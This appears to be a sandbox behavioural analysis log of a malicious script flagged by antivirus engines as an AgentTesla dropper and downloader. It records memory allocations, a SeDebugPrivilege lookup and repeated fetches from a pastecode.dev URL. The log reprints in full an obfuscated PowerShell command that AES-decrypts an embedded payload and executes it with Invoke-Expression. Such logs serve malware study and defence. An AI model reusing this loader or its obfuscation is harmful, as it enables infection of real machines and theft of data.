stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02666000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02668000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02669000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
cmdline powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
filepath: powershell.exe
1 1 0
Skyhigh BehavesLike.VBS.Dropper.lv
Symantec ISB.Downloader!gen40
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.Script.Startup.gen
Google Detected
Microsoft Trojan:VBS/AgentTesla.AMA!MTB
Varist VBS/Agent.BOA
AVG Script:SNH-gen [Drp]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data sent zvfÔ i1õw*¯ l´ÀÒb ŠCµf!žüÞ/5 ÀÀÀ À 285ÿia803405.us.archive.org  
Data sent zvfÔ ~8¼ `F´X» ²)h¡ž®ÁtŽÜñ¤Æk/5 ÀÀÀ À 285ÿia803405.us.archive.org  
Data sent zvfÔ {")rP\ZÖ#æÄYÓm¢¢*Á`|qû/5 ÀÀÀ À 285ÿia803405.us.archive.org  
Data sent zvfÔ!T;—êjÐÌ ¿Vìøþ,çâ¨ÉŒ ÉX/5 ÀÀÀ À 285ÿia803405.us.archive.org  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

InternetCrackUrlA

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

InternetReadFile

buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

InternetReadFile

buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

InternetReadFile

buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function
request_handle: 0x00cc000c
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0010
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369364 0

InternetReadFile

buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function
request_handle: 0x00cc0014
1 1 0

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

InternetReadFile

buffer: Function Adnascente(anilocros, gomma, berro) Dim feramina feramina = Split(anilocros, gomma) Adnascente = Join(feramina, berro) End Function
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://pastecode.dev/raw/6l7qjjrz/paste1.txt
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /raw/6l7qjjrz/paste1.txt
1 13369356 0

send

buffer: !
socket: 848
sent: 1
1 1 0

send

buffer: plfÔw&Š™Õ_Î¨Ó“ ôY¶µ’'Ÿ8ËNKºR̕/5 ÀÀÀ À 28+ÿ pastecode.dev  
socket: 968
sent: 117
1 117 0

send

buffer: !
socket: 848
sent: 1
1 1 0

send

buffer: FBA‚2Ð&`ŽïRl¨°.ɱ!äfB2Ñ»f=72P‚¤€ WÚáÍ(/îJ,Eòò®O¨!óS{⣜0/ÕÒ³þ,ÞöJð§¸Î[Z² ŽÈÎÒmqi ±óÏÒ_‚<ÔÝ^AÚW¦’w"“ß
socket: 968
sent: 134
1 134 0

send

buffer: !
socket: 848
sent: 1
1 1 0

send

buffer: p»ç`ð¬ wØ7Älƒì]h†ˆrê¶×v¿ Dq¹ûÊd¸Ü‹ô0úQŒÅ|ÿœÉf’ïI7½ˆ„A7-=ƒ‡È›«¼®.ݞù ed¹¨¹½ÇŠí‰äµÔC<fj¿2˜áñ\=« ê:)x̘C6A AjÒ×õ%&Ù$Ü-jŽL@¹Qêzö²ùS_±tÖÀUž!B· –ì–æ„øtÿÀH?-I¢ë ‹ÁPUbW{_¢ëC©¥­Â@„A:#ä„@g›(÷Fn¤fÝ ",!}¥{G”Ú+ã¶Bi7âyO““Dn–{zþNð]¸W(K‘ÖµbÓbXÇ­‰¢s›Å=®L:œ®hØ`Ím|êÏj'Ô<‘‹½yzbX44JγÜåýd€›4öZþK¼¡m\yþ3ÕQ啇e^Ô6Á]»Drޅ(Ðõàƒ#Z¨vr˜ú˜uƒŸø
socket: 968
sent: 373
1 373 0

send

buffer: !
socket: 848
sent: 1
1 1 0

InternetCrackUrlA

